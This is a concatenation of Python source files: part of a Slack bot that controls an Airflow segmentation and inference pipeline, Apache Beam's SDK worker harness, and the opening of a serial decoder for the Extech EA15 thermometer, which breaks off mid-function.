sc = slack.WebClient(slack_token, timeout=300)
channel = msg['channel']
userid = msg['user']
thread_ts = msg['thread_ts'] if 'thread_ts' in msg else msg['ts']
reply_msg = "<@{}> {}".format(userid, reply)
rc = sc.chat_postMessage(
username=username,
channel=channel,
thread_ts=thread_ts,
reply_broadcast=broadcast,
text=reply_msg
)
if not rc["ok"]:
print("Failed to send slack message")
print(rc)
def cancel_run(msg):
replyto(msg, "Shutting down clusters...")
cluster_size = get_variable('cluster_target_size', deserialize_json=True)
for k in cluster_size:
cluster_size[k] = 0
set_variable("cluster_target_size", cluster_size, serialize_json=True)
run_dag("cluster_management")
time.sleep(10)
replyto(msg, "Marking all DAG states to success...")
dags = ['segmentation','watershed','agglomeration', 'chunkflow_worker', 'chunkflow_generator', 'igneous', 'custom']
mark_dags_success(dags)
time.sleep(10)
#try again because some tasks might already been scheduled
dags = ['segmentation','watershed','agglomeration', 'chunkflow_worker', 'chunkflow_generator', 'igneous', 'custom']
mark_dags_success(dags)
time.sleep(10)
replyto(msg, "Draining tasks from the queues...")
drain_messages("amqp://172.31.31.249:5672", "igneous")
drain_messages("amqp://172.31.31.249:5672", "custom")
drain_messages("amqp://172.31.31.249:5672", "chunkflow")
replyto(msg, "*Current run cancelled*", broadcast=True)
def upload_param(msg, param):
sc = slack.WebClient(slack_token, timeout=300)
channel = msg['channel']
userid = msg['user']
thread_ts = msg['thread_ts'] if 'thread_ts' in msg else msg['ts']
sc.files_upload(
channels=channel,
filename="param.json",
filetype="javascript",
thread_ts=thread_ts,
content=json.dumps(param, indent=4),
initial_comment="<@{}> current parameters".format(userid)
)
def update_metadata(msg):
sc = slack.WebClient(slack_token, timeout=300)
payload = {
'user': msg['user'],
'channel': msg['channel'],
'thread_ts': msg['thread_ts'] if 'thread_ts' in msg else msg['ts']
}
update_slack_connection(payload, slack_token)
rc = sc.users_info(
user=msg['user']
)
global task_owner
if rc["ok"]:
task_owner = rc["user"]["profile"]["display_name"]
def download_file(msg):
if "files" not in msg:
replyto(msg, "You need to upload a parameter file with this message")
return None, None
else:
# only use the first file:
file_info = msg["files"][0]
private_url = file_info["url_private_download"]
filetype = file_info["pretty_type"]
response = requests.get(private_url, headers={'Authorization': 'Bearer {}'.format(slack_token)})
if response.status_code == 200:
return filetype, response.content.decode("ascii", "ignore")
else:
return None, None
def download_json(msg):
filetype, content = download_file(msg)
if not content:
return None
if filetype == "JavaScript/JSON":
try:
json_obj = json5.loads(content, object_pairs_hook=OrderedDict)
except (ValueError, TypeError) as e:
replyto(msg, "Cannot load the json file: {}".format(str(e)))
return None
return json_obj
if filetype == "Python":
scope = {}
try:
exec(content, scope)
if "submit_parameters" not in scope or not callable(scope["submit_parameters"]):
return None
payloads = scope['submit_parameters']()
except:
replyto(msg, "Cannot execute the `submit_parameters` function in the script")
upload_param(msg, payloads)
return payloads
def update_inference_param(msg):
global param_updated
json_obj = download_json(msg)
if json_obj:
if not check_running():
clear_queues()
drain_messages("amqp://172.31.31.249:5672", "chunkflow")
if isinstance(json_obj, list):
replyto(msg, "*{} batch jobs detected, only sanity check the first one for now*".format(len(json_obj)))
q_payload.put(json_obj)
json_obj = json_obj[0]
supply_default_param(json_obj)
replyto(msg, "Running chunkflow setup_env, please wait")
update_metadata(msg)
set_variable('inference_param', json_obj, serialize_json=True)
chunkflow_set_env()
param_updated = True
else:
replyto(msg, "Busy right now")
return
def update_param(msg):
global param_updated
json_obj = download_json(msg)
if json_obj:
if not check_running():
clear_queues()
if isinstance(json_obj, list):
if (len(json_obj) > 1):
replyto(msg, "*{} batch jobs detected, only sanity check the first one for now*".format(len(json_obj)))
q_payload.put(json_obj)
json_obj = json_obj[0]
supply_default_param(json_obj)
replyto(msg, "Running sanity check, please wait")
update_metadata(msg)
set_variable('param', json_obj, serialize_json=True)
sanity_check()
param_updated = True
else:
replyto(msg, "Busy right now")
return
def run_igneous_scripts(msg):
_, payload = download_file(msg)
if payload:
if not check_running():
create_run_token(msg)
update_metadata(msg)
set_variable('igneous_script', payload)
replyto(msg, "Execute `submit_tasks` function")
run_igneous_tasks()
else:
replyto(msg, "Busy right now")
return
def run_custom_scripts(msg):
_, payload = download_file(msg)
if payload:
if not check_running():
create_run_token(msg)
update_metadata(msg)
set_variable('custom_script', payload)
replyto(msg, "Execute `submit_tasks` function")
run_custom_tasks()
else:
replyto(msg, "Busy right now")
return
def supply_default_param(json_obj):
if not json_obj.get("NAME", ""):
json_obj["NAME"] = token_hex(16)
if "SCRATCH_PREFIX" not in json_obj and "SCRATCH_PATH" not in json_obj:
json_obj["SCRATCH_PREFIX"] = "gs://ranl_pipeline_scratch/"
for p in ["WS","SEG"]:
if "{}_PREFIX".format(p) not in json_obj and "{}_PATH".format(p) not in json_obj:
json_obj["{}_PREFIX".format(p)] = json_obj.get("NG_PREFIX", "gs://ng_scratch_ranl/make_cv_happy/") + p.lower() + "/"
def dispatch_command(cmd, payload):
global param_updated
msg = payload['data']
print(cmd)
if cmd == "parameters":
param = get_variable("param", deserialize_json=True)
upload_param(msg, param)
elif cmd == "updateparameters":
update_param(msg)
elif cmd == "updateinferenceparameters":
update_inference_param(msg)
elif cmd.startswith("cancelrun"):
token = get_variable("run_token")
if not token:
replyto(msg, "The bot is idle, nothing to cancel")
elif cmd != "cancelrun"+token:
replyto(msg, "Wrong token")
else:
if check_running():
clear_queues()
q_cmd.put("cancel")
cancel_run(msg)
set_variable("run_token", "")
else:
replyto(msg, "The bot is idle, nothing to cancel")
elif cmd == "runsegmentation" or cmd == "runsegmentations":
state, _ = dag_state("sanity_check")
if check_running():
replyto(msg, "I am busy right now")
elif not param_updated:
replyto(msg, "You have to update the parameters before starting the segmentation")
elif state != "success":
replyto(msg, "Sanity check failed, try again")
else:
replyto(msg, "Start segmentation")
create_run_token(msg)
update_metadata(msg)
param_updated = False
if q_payload.qsize() == 0:
run_segmentation()
else:
q_payload.put(msg)
q_cmd.put("runseg")
elif cmd == "runinference" or cmd == "runinferences":
state, _ = dag_state("chunkflow_generator")
if check_running():
replyto(msg, "I am busy right now")
elif not param_updated:
replyto(msg, "You have to update the parameters before starting the inference")
elif state != "success":
replyto(msg, "Chunkflow set_env failed, try again")
else:
replyto(msg, "Start inference")
create_run_token(msg)
update_metadata(msg)
param_updated = False
if q_payload.qsize() == 0:
run_inference()
else:
q_payload.put(msg)
q_cmd.put("runinf")
elif cmd == "runigneoustask" or cmd == "runigneoustasks":
if check_running():
replyto(msg, "I am busy right now")
else:
run_igneous_scripts(msg)
elif cmd == "runcustomtask" or cmd == "runcustomtasks":
if check_running():
replyto(msg, "I am busy right now")
else:
run_custom_scripts(msg)
elif cmd == "extractcontactsurfaces":
state, _ = dag_state("sanity_check")
if check_running():
replyto(msg, "I am busy right now")
elif state != "success":
replyto(msg, "Sanity check failed, try again")
else:
replyto(msg, "Extract contact surfaces")
create_run_token(msg)
update_metadata(msg)
param_updated = False
run_contact_surface()
else:
replyto(msg, "Sorry I do not understand, please try again.")
@slack.RTMClient.run_on(event='message')
def process_message(**payload):
m = payload['data']
print(json.dumps(m, indent=4))
if filter_msg(m):
cmd = extract_command(m)
dispatch_command(cmd, payload)
@slack.RTMClient.run_on(event='reaction_added')
def process_reaction(**payload):
print("reaction added")
m = payload['data']
print(json.dumps(m, indent=4))
@slack.RTMClient.run_on(event='hello')
def hello_world(**payload):
client = slack.WebClient(token=slack_token)
host_ip = gcloud_ip()
set_variable("webui_ip", host_ip)
client.chat_postMessage(
channel='#seuron-alerts',
username=workerid,
text="Hello world from <https://{}/airflow/admin/|{}>!".format(host_ip, host_ip))
def handle_batch(q_payload, q_cmd):
while True:
current_task="runseg"
logger.debug("check queue")
time.sleep(1)
if q_payload.qsize() == 0:
continue
if q_cmd.qsize() != 0:
cmd = q_cmd.get()
if cmd != "runseg" and cmd != "runinf":
continue
else:
current_task = cmd
else:
continue
logger.debug("get message from queue")
json_obj = q_payload.get()
msg = q_payload.get()
if json_obj is None:
continue
if (not isinstance(json_obj, list)) or (not isinstance(json_obj[0], dict)):
replyto(msg, "Batch process expects an array of dicts from the json file")
continue
replyto(msg, "Batch jobs will reuse on the parameters from the first job unless new parameters are specified, *including those with default values*")
default_param = json_obj[0]
for i, p in enumerate(json_obj):
if q_cmd.qsize() != 0:
cmd = q_cmd.get()
if cmd == "cancel":
replyto(msg, "Cancel batch process")
break
param = deepcopy(default_param)
if i > 0:
if 'NAME' in param:
del param['NAME']
for k in p:
param[k] = p[k]
supply_default_param(param)
update_metadata(msg)
replyto(msg, "*Sanity check: batch job {} out of {}*".format(i+1, len(json_obj)))
state = "unknown"
if current_task == "runseg":
set_variable('param', param, serialize_json=True)
sanity_check()
wait_for_airflow()
state, _ = dag_state("sanity_check")
elif current_task == "runinf":
set_variable('inference_param', param, serialize_json=True)
chunkflow_set_env()
wait_for_airflow()
state, _ = dag_state("chunkflow_generator")
if state != "success":
replyto(msg, "*Sanity check failed, abort!*")
break
state = "unknown"
replyto(msg, "*Starting batch job {} out of {}*".format(i+1, len(json_obj)), broadcast=True)
if current_task == "runseg":
run_segmentation()
wait_for_airflow()
state, _ = dag_state("segmentation")
elif current_task == "runinf":
run_inference()
wait_for_airflow()
state, _ = dag_state("chunkflow_worker")
if state != "success":
replyto(msg, "*Bach job failed, abort!*")
break
replyto(msg, "*Batch process finished*")
def wait_for_airflow():
while check_running():
logger.debug("waiting for airflow")
time.sleep(60)
if __name__ == '__main__':
task_owner = "seuronbot"
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
q_payload = queue.Queue()
q_cmd = queue.Queue()
batch = threading.Thread(target=handle_batch, args=(q_payload, q_cmd,))
hello_world()
batch.start()
#logger.info("subprocess pid: {}".format(batch.pid))
rtmclient = slack.RTMClient(token=slack_token)
rtmclient.start()
batch.join()
|
sdk_worker.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""SDK harness for executing Python Fns via the Fn API."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import contextlib
import logging
import queue
import sys
import threading
import time
import traceback
from builtins import object
from builtins import range
from concurrent import futures
import grpc
from future.utils import raise_
from future.utils import with_metaclass
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.runners.worker import bundle_processor
from apache_beam.runners.worker import data_plane
from apache_beam.runners.worker.channel_factory import GRPCChannelFactory
from apache_beam.runners.worker.worker_id_interceptor import WorkerIdInterceptor
class SdkHarness(object):
REQUEST_METHOD_PREFIX = '_request_'
SCHEDULING_DELAY_THRESHOLD_SEC = 5*60 # 5 Minutes
def __init__(
self, control_address, worker_count, credentials=None, worker_id=None,
profiler_factory=None):
self._alive = True
self._worker_count = worker_count
self._worker_index = 0
self._worker_id = worker_id
if credentials is None:
logging.info('Creating insecure control channel for %s.', control_address)
self._control_channel = GRPCChannelFactory.insecure_channel(
control_address)
else:
logging.info('Creating secure control channel for %s.', control_address)
self._control_channel = GRPCChannelFactory.secure_channel(
control_address, credentials)
grpc.channel_ready_future(self._control_channel).result(timeout=60)
logging.info('Control channel established.')
self._control_channel = grpc.intercept_channel(
self._control_channel, WorkerIdInterceptor(self._worker_id))
self._data_channel_factory = data_plane.GrpcClientDataChannelFactory(
credentials)
self._state_handler_factory = GrpcStateHandlerFactory(credentials)
self._profiler_factory = profiler_factory
self._fns = {}
# BundleProcessor cache across all workers.
self._bundle_processor_cache = BundleProcessorCache(
state_handler_factory=self._state_handler_factory,
data_channel_factory=self._data_channel_factory,
fns=self._fns)
# workers for process/finalize bundle.
self.workers = queue.Queue()
# one worker for progress/split request.
self.progress_worker = SdkWorker(self._bundle_processor_cache,
profiler_factory=self._profiler_factory)
# one thread is enough for getting the progress report.
# Assumption:
# Progress report generation should not do IO or wait on other resources.
# Without wait, having multiple threads will not improve performance and
# will only add complexity.
self._progress_thread_pool = futures.ThreadPoolExecutor(max_workers=1)
# finalize and process share one thread pool.
self._process_thread_pool = futures.ThreadPoolExecutor(
max_workers=self._worker_count)
self._responses = queue.Queue()
self._process_bundle_queue = queue.Queue()
self._unscheduled_process_bundle = {}
logging.info('Initializing SDKHarness with %s workers.', self._worker_count)
def run(self):
control_stub = beam_fn_api_pb2_grpc.BeamFnControlStub(self._control_channel)
no_more_work = object()
# Create process workers
for _ in range(self._worker_count):
# SdkHarness manage function registration and share self._fns with all
# the workers. This is needed because function registration (register)
# and exceution(process_bundle) are send over different request and we
# do not really know which woker is going to process bundle
# for a function till we get process_bundle request. Moreover
# same function is reused by different process bundle calls and
# potentially get executed by different worker. Hence we need a
# centralized function list shared among all the workers.
self.workers.put(
SdkWorker(self._bundle_processor_cache,
profiler_factory=self._profiler_factory))
def get_responses():
while True:
response = self._responses.get()
if response is no_more_work:
return
yield response
self._alive = True
monitoring_thread = threading.Thread(target=self._monitor_process_bundle)
monitoring_thread.daemon = True
monitoring_thread.start()
try:
for work_request in control_stub.Control(get_responses()):
logging.debug('Got work %s', work_request.instruction_id)
request_type = work_request.WhichOneof('request')
# Name spacing the request method with 'request_'. The called method
# will be like self.request_register(request)
getattr(self, SdkHarness.REQUEST_METHOD_PREFIX + request_type)(
work_request)
finally:
self._alive = False
logging.info('No more requests from control plane')
logging.info('SDK Harness waiting for in-flight requests to complete')
# Wait until existing requests are processed.
self._progress_thread_pool.shutdown()
self._process_thread_pool.shutdown()
# get_responses may be blocked on responses.get(), but we need to return
# control to its caller.
self._responses.put(no_more_work)
# Stop all the workers and clean all the associated resources
self._data_channel_factory.close()
self._state_handler_factory.close()
logging.info('Done consuming work.')
def _execute(self, task, request):
try:
response = task()
except Exception: # pylint: disable=broad-except
traceback_string = traceback.format_exc()
print(traceback_string, file=sys.stderr)
logging.error(
'Error processing instruction %s. Original traceback is\n%s\n',
request.instruction_id, traceback_string)
response = beam_fn_api_pb2.InstructionResponse(
instruction_id=request.instruction_id, error=traceback_string)
self._responses.put(response)
def _request_register(self, request):
def task():
for process_bundle_descriptor in getattr(
request, request.WhichOneof('request')).process_bundle_descriptor:
self._fns[process_bundle_descriptor.id] = process_bundle_descriptor
return beam_fn_api_pb2.InstructionResponse(
instruction_id=request.instruction_id,
register=beam_fn_api_pb2.RegisterResponse())
self._execute(task, request)
def _request_process_bundle(self, request):
def task():
# Take the free worker. Wait till a worker is free.
worker = self.workers.get()
# Get the first work item in the queue
work = self._process_bundle_queue.get()
self._unscheduled_process_bundle.pop(work.instruction_id, None)
try:
self._execute(lambda: worker.do_instruction(work), work)
finally:
# Put the worker back in the free worker pool
self.workers.put(worker)
# Create a task for each process_bundle request and schedule it
self._process_bundle_queue.put(request)
self._unscheduled_process_bundle[request.instruction_id] = time.time()
self._process_thread_pool.submit(task)
logging.debug(
"Currently using %s threads." % len(self._process_thread_pool._threads))
def _request_process_bundle_split(self, request):
self._request_process_bundle_action(request)
def _request_process_bundle_progress(self, request):
self._request_process_bundle_action(request)
def _request_process_bundle_action(self, request):
def task():
instruction_reference = getattr(
request, request.WhichOneof('request')).instruction_reference
# only process progress/split request when a bundle is in processing.
if (instruction_reference in
self._bundle_processor_cache.active_bundle_processors):
self._execute(
lambda: self.progress_worker.do_instruction(request), request)
else:
self._execute(lambda: beam_fn_api_pb2.InstructionResponse(
instruction_id=request.instruction_id, error=(
'Process bundle request not yet scheduled for instruction {}' if
instruction_reference in self._unscheduled_process_bundle else
'Unknown process bundle instruction {}').format(
instruction_reference)), request)
self._progress_thread_pool.submit(task)
def _request_finalize_bundle(self, request):
def task():
# Get one available worker.
worker = self.workers.get()
try:
self._execute(
lambda: worker.do_instruction(request), request)
finally:
# Put the worker back in the free worker pool.
self.workers.put(worker)
self._process_thread_pool.submit(task)
def _monitor_process_bundle(self):
"""
Monitor the unscheduled bundles and log if a bundle is not scheduled for
more than SCHEDULING_DELAY_THRESHOLD_SEC.
"""
while self._alive:
time.sleep(SdkHarness.SCHEDULING_DELAY_THRESHOLD_SEC)
# Check for bundles to be scheduled.
if self._unscheduled_process_bundle:
current_time = time.time()
for instruction_id in self._unscheduled_process_bundle:
request_time = None
try:
request_time = self._unscheduled_process_bundle[instruction_id]
except KeyError:
pass
if request_time:
scheduling_delay = current_time - request_time
if scheduling_delay > SdkHarness.SCHEDULING_DELAY_THRESHOLD_SEC:
logging.warn('Unable to schedule instruction %s for %s',
instruction_id, scheduling_delay)
class BundleProcessorCache(object):
def __init__(self, state_handler_factory, data_channel_factory, fns):
self.fns = fns
self.state_handler_factory = state_handler_factory
self.data_channel_factory = data_channel_factory
self.active_bundle_processors = {}
self.cached_bundle_processors = collections.defaultdict(list)
def register(self, bundle_descriptor):
self.fns[bundle_descriptor.id] = bundle_descriptor
def get(self, instruction_id, bundle_descriptor_id):
try:
# pop() is threadsafe
processor = self.cached_bundle_processors[bundle_descriptor_id].pop()
except IndexError:
processor = bundle_processor.BundleProcessor(
self.fns[bundle_descriptor_id],
self.state_handler_factory.create_state_handler(
self.fns[bundle_descriptor_id].state_api_service_descriptor),
self.data_channel_factory)
self.active_bundle_processors[
instruction_id] = bundle_descriptor_id, processor
return processor
def lookup(self, instruction_id):
return self.active_bundle_processors.get(instruction_id, (None, None))[-1]
def discard(self, instruction_id):
del self.active_bundle_processors[instruction_id]
def release(self, instruction_id):
descriptor_id, processor = self.active_bundle_processors.pop(instruction_id)
processor.reset()
self.cached_bundle_processors[descriptor_id].append(processor)
class SdkWorker(object):
def __init__(self, bundle_processor_cache, profiler_factory=None):
self.bundle_processor_cache = bundle_processor_cache
self.profiler_factory = profiler_factory
def do_instruction(self, request):
request_type = request.WhichOneof('request')
if request_type:
# E.g. if register is set, this will call self.register(request.register))
return getattr(self, request_type)(getattr(request, request_type),
request.instruction_id)
else:
raise NotImplementedError
def register(self, request, instruction_id):
for process_bundle_descriptor in request.process_bundle_descriptor:
self.bundle_processor_cache.register(process_bundle_descriptor)
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
register=beam_fn_api_pb2.RegisterResponse())
def process_bundle(self, request, instruction_id):
bundle_processor = self.bundle_processor_cache.get(
instruction_id, request.process_bundle_descriptor_reference)
try:
with bundle_processor.state_handler.process_instruction_id(
instruction_id):
with self.maybe_profile(instruction_id):
delayed_applications, requests_finalization = (
bundle_processor.process_bundle(instruction_id))
response = beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle=beam_fn_api_pb2.ProcessBundleResponse(
residual_roots=delayed_applications,
metrics=bundle_processor.metrics(),
monitoring_infos=bundle_processor.monitoring_infos(),
requires_finalization=requests_finalization))
# Don't release here if finalize is needed.
if not requests_finalization:
self.bundle_processor_cache.release(instruction_id)
return response
except: # pylint: disable=broad-except
# Don't re-use bundle processors on failure.
self.bundle_processor_cache.discard(instruction_id)
raise
def process_bundle_split(self, request, instruction_id):
processor = self.bundle_processor_cache.lookup(
request.instruction_reference)
if processor:
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle_split=processor.try_split(request))
else:
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
error='Instruction not running: %s' % instruction_id)
def process_bundle_progress(self, request, instruction_id):
# It is an error to get progress for a not-in-flight bundle.
processor = self.bundle_processor_cache.lookup(
request.instruction_reference)
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle_progress=beam_fn_api_pb2.ProcessBundleProgressResponse(
metrics=processor.metrics() if processor else None,
monitoring_infos=processor.monitoring_infos() if processor else []))
def finalize_bundle(self, request, instruction_id):
processor = self.bundle_processor_cache.lookup(
request.instruction_reference)
if processor:
try:
finalize_response = processor.finalize_bundle()
self.bundle_processor_cache.release(request.instruction_reference)
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
finalize_bundle=finalize_response)
except:
self.bundle_processor_cache.discard(request.instruction_reference)
raise
else:
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
error='Instruction not running: %s' % instruction_id)
@contextlib.contextmanager
def maybe_profile(self, instruction_id):
if self.profiler_factory:
profiler = self.profiler_factory(instruction_id)
if profiler:
with profiler:
yield
else:
yield
else:
yield
class StateHandlerFactory(with_metaclass(abc.ABCMeta, object)):
"""An abstract factory for creating ``DataChannel``."""
@abc.abstractmethod
def create_state_handler(self, api_service_descriptor):
"""Returns a ``StateHandler`` from the given ApiServiceDescriptor."""
raise NotImplementedError(type(self))
@abc.abstractmethod
def close(self):
"""Close all channels that this factory owns."""
raise NotImplementedError(type(self))
class GrpcStateHandlerFactory(StateHandlerFactory):
"""A factory for ``GrpcStateHandler``.
Caches the created channels by ``state descriptor url``.
"""
def __init__(self, credentials=None):
self._state_handler_cache = {}
self._lock = threading.Lock()
self._throwing_state_handler = ThrowingStateHandler()
self._credentials = credentials
def create_state_handler(self, api_service_descriptor):
if not api_service_descriptor:
return self._throwing_state_handler
url = api_service_descriptor.url
if url not in self._state_handler_cache:
with self._lock:
if url not in self._state_handler_cache:
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size is
# controlled in a layer above.
options = [('grpc.max_receive_message_length', -1),
('grpc.max_send_message_length', -1)]
if self._credentials is None:
logging.info('Creating insecure state channel for %s.', url)
grpc_channel = GRPCChannelFactory.insecure_channel(
url, options=options)
else:
logging.info('Creating secure state channel for %s.', url)
grpc_channel = GRPCChannelFactory.secure_channel(
url, self._credentials, options=options)
logging.info('State channel established.')
# Add workerId to the grpc channel
grpc_channel = grpc.intercept_channel(grpc_channel,
WorkerIdInterceptor())
self._state_handler_cache[url] = GrpcStateHandler(
beam_fn_api_pb2_grpc.BeamFnStateStub(grpc_channel))
return self._state_handler_cache[url]
def close(self):
logging.info('Closing all cached gRPC state handlers.')
for _, state_handler in self._state_handler_cache.items():
state_handler.done()
self._state_handler_cache.clear()
class ThrowingStateHandler(object):
"""A state handler that errors on any requests."""
def blocking_get(self, state_key, instruction_reference):
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor without '
'out state ApiServiceDescriptor for instruction %s and state key %s.'
% (state_key, instruction_reference))
def blocking_append(self, state_key, data, instruction_reference):
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor without '
'out state ApiServiceDescriptor for instruction %s and state key %s.'
% (state_key, instruction_reference))
def blocking_clear(self, state_key, instruction_reference):
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor without '
'out state ApiServiceDescriptor for instruction %s and state key %s.'
% (state_key, instruction_reference))
class GrpcStateHandler(object):
_DONE = object()
def __init__(self, state_stub):
self._lock = threading.Lock()
self._state_stub = state_stub
self._requests = queue.Queue()
self._responses_by_id = {}
self._last_id = 0
self._exc_info = None
self._context = threading.local()
self.start()
@contextlib.contextmanager
def process_instruction_id(self, bundle_id):
if getattr(self._context, 'process_instruction_id', None) is not None:
raise RuntimeError(
'Already bound to %r' % self._context.process_instruction_id)
self._context.process_instruction_id = bundle_id
try:
yield
finally:
self._context.process_instruction_id = None
def start(self):
self._done = False
def request_iter():
while True:
request = self._requests.get()
if request is self._DONE or self._done:
break
yield request
responses = self._state_stub.State(request_iter())
def pull_responses():
try:
for response in responses:
self._responses_by_id[response.id].set(response)
if self._done:
break
except: # pylint: disable=bare-except
self._exc_info = sys.exc_info()
raise
reader = threading.Thread(target=pull_responses, name='read_state')
reader.daemon = True
reader.start()
def done(self):
self._done = True
self._requests.put(self._DONE)
def blocking_get(self, state_key, continuation_token=None):
response = self._blocking_request(
beam_fn_api_pb2.StateRequest(
state_key=state_key,
get=beam_fn_api_pb2.StateGetRequest(
continuation_token=continuation_token)))
return response.get.data, response.get.continuation_token
def blocking_append(self, state_key, data):
self._blocking_request(
beam_fn_api_pb2.StateRequest(
state_key=state_key,
append=beam_fn_api_pb2.StateAppendRequest(data=data)))
def blocking_clear(self, state_key):
self._blocking_request(
beam_fn_api_pb2.StateRequest(
state_key=state_key,
clear=beam_fn_api_pb2.StateClearRequest()))
def _blocking_request(self, request):
request.id = self._next_id()
request.instruction_reference = self._context.process_instruction_id
self._responses_by_id[request.id] = future = _Future()
self._requests.put(request)
while not future.wait(timeout=1):
if self._exc_info:
t, v, tb = self._exc_info
raise_(t, v, tb)
elif self._done:
raise RuntimeError()
del self._responses_by_id[request.id]
response = future.get()
if response.error:
raise RuntimeError(response.error)
else:
return response
def _next_id(self):
self._last_id += 1
return str(self._last_id)
class _Future(object):
"""A simple future object to implement blocking requests.
"""
def __init__(self):
self._event = threading.Event()
def wait(self, timeout=None):
return self._event.wait(timeout)
def get(self, timeout=None):
if self.wait(timeout):
return self._value
else:
raise LookupError()
def set(self, value):
self._value = value
self._event.set()
|
extech_ea15.py | #!/usr/bin/env python
# Copyright 2020 Kent A. Vander Velden <kent.vandervelden@gmail.com>
#
# If you use this software, please consider contacting me. I'd like to hear
# about your work.
#
# This file is part of Extech-EA15, a decoder for the Extech EA15 thermocouple
# datalogging thermometer.
#
# Please see LICENSE for limitations on use.
#
# If you see a permission problem with accessing serial ports, the following may help.
# Add yourself to the dialout group and remove modemmanager.
# $ adduser kent dialout
# $ apt remove modemmanager
import datetime
import multiprocessing as mp
import random
import time
import serial
class Temperature:
v_ = 0
valid_ = False
def __init__(self, v=None, u='C'):
if v is not None:
self.set(v, u)
def __str__(self):
return f'{self.v_:.02f}C'
def set(self, v, u='C'):
self.valid_ = True
if u == 'C':
self.v_ = v
elif u == 'F':
self.v_ = self.f2c(v)
elif u == 'K':
self.v_ = self.k2c(v)
else:
self.valid_ = False
def C(self):
return self.v_
def F(self):
return self.c2f(self.v_)
def K(self):
return self.c2k(self.v_)
@staticmethod
def f2c(v):
return (v - 32) * (5 / 9.)
@staticmethod
def k2c(v):
return v - 273.15
@staticmethod
def c2f(v):
return v * (9 / 5.) + 32
@staticmethod
def c2k(v):
return v + 273.15
class ExtechEA15Serial:
ser = None
download_datalog_ = False
def __init__(self, dev_fn='', timeformat='datetime'):
self.open(dev_fn)
def __del__(self):
if self.ser is not None:
self.ser.close()
def __enter__(self):
return self
def __exit__(self, type_, value, tb):
pass
def open(self, dev_fn):
# Timeout must be less than the interval between consecutive packets, ~ 1.5s
# and not so long that recording the timestamp is delay. 0.1s seems fine.
self.ser = serial.Serial(dev_fn, 9600, timeout=.1)
def decode(self, buf, dt=None):
d = {'dt': datetime.datetime.now() if dt is None else dt,
't1': Temperature(),
't1u': '',
't2': '',
't2u': '',
'type': '',
'valid': False
}
d2 = {'dt': d['dt'],
't1': Temperature(),
't2': Temperature(),
'type': '',
'valid': False
}
if not (buf[0] == 0x02 and buf[-1] == 0x03 and len(buf) == 9):
return d2
temp_units = {0: 'C', 2: 'K', 3: 'F'}
sensor_types = {0: 'K', 1: 'J', 2: 'E', 3: 'T', 4: 'R', 5: 'S', 6: 'N'}
try:
s1 = 1
if buf[1] & 0xf0:
s1 = -1
s2 = 1
if buf[4] & 0xf0:
s2 = -1
d['t1'] = s1 * (buf[2] * 0xff + buf[3]) / 10.
d['t1u'] = temp_units[buf[1] & 0x7f]
d['t2'] = s2 * (buf[5] * 0xff + buf[6]) / 10.
d['t2u'] = temp_units[buf[4] & 0x7f]
d['type'] = sensor_types[buf[7]]
except KeyError as e:
print(e, buf)
d['valid'] = False
else:
d['valid'] = True
d2 = {'dt': d['dt'],
't1': Temperature(d['t1'], d['t1u']),
't2': Temperature(d['t2'], d['t2u']),
'type': d['type'],
'valid': d['valid'],
}
return d2
def decode2(self, buf, start_dt):
if not (buf[0] == 0x02 and buf[-1] == 0x03):
return []
all_lst = []
i = 1
s = 0
sps = 0
lst = []
marker = b'\x00\x55\xaa\x00'
while True:
if s == 0:
if len(buf) <= i + 5:
break
if buf[i:i + 4] == marker:
s = 1
sps = buf[i + 4]
i += 5
else:
i += 1
else:
if len(buf) <= i + 7:
break
if buf[i:i + 4] == marker:
all_lst += [(sps, lst)]
lst = []
sps = buf[i + 4]
i += 5
else:
bb = buf[i:i + 7]
bb = b'\x02' + bb + b'\x03'
lst += [self.decode(bb, start_dt + datetime.timedelta(seconds=i * sps))]
i += 7
if i + 1 != len(buf):
print(f'Truncated download: {i + 1} {len(buf)}')
if lst:
all_lst += [(sps, lst)]
return all_lst
datalog_download_state_ = 0
datalog_expected_ = 0
def decode_one(self):
while True:
if self.download_datalog_ and self.datalog_download_state_ == 0:
self.datalog_download_state_ = 1
self.download_datalog_ = False
packet_type = 0
buf = b''
st0 = time.time()
while True:
c = self.ser.read()
et = time.time()
# There is a small delay, ~1.5s, between packets. Use the delay to tokenize the
# serial stream. When the delay greater than the serial timeout, c will be empty.
# If buf is not empty, check if buf may contain a packet.
if buf and not c:
if buf[0] == 0x02 and buf[-1] == 0x03:
if buf.startswith(b'\x02\x00\x55\xaa\x00'):
if len(buf) == self.datalog_expected_ + 2:
packet_type = 3
else:
if len(buf) == 9:
packet_type = 1
elif len(buf) == 5:
packet_type = 2
break
# Start over
if st0 - et > .5:
print('Restarting')
buf = b''
continue
# Don't wait forever
elif st0 - et > 5:
print('Aborting')
return None
buf += c
if packet_type == 0:
print('Unable to decode:', buf)
else:
if packet_type == 1:
if self.datalog_download_state_ == 1:
self.ser.write(b'\x41')
self.ser.flush()
elif self.datalog_download_state_ == 2:
self.ser.write(b'\x55')
self.ser.flush()
if packet_type == 1:
return self.decode(buf)
elif packet_type == 2:
# print('Datalog len packet:', buf)
